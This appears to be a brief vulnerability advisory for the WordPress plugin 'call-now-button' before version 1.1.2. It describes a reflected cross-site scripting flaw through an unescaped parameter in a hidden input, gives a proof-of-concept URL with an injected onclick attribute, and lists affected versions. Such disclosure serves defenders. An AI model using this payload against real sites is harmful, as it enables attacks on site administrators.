The plugin does not escape a parameter before outputting it back in an attribute of a hidden input, leading to a Reflected Cross-Site Scripting when the premium is enabled
With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid;=xxxxx" accesskey=X onclick=alert(/XSS/) test="
CPE | Name | Operator | Version |
---|---|---|---|
call-now-button | lt | 1.1.2 |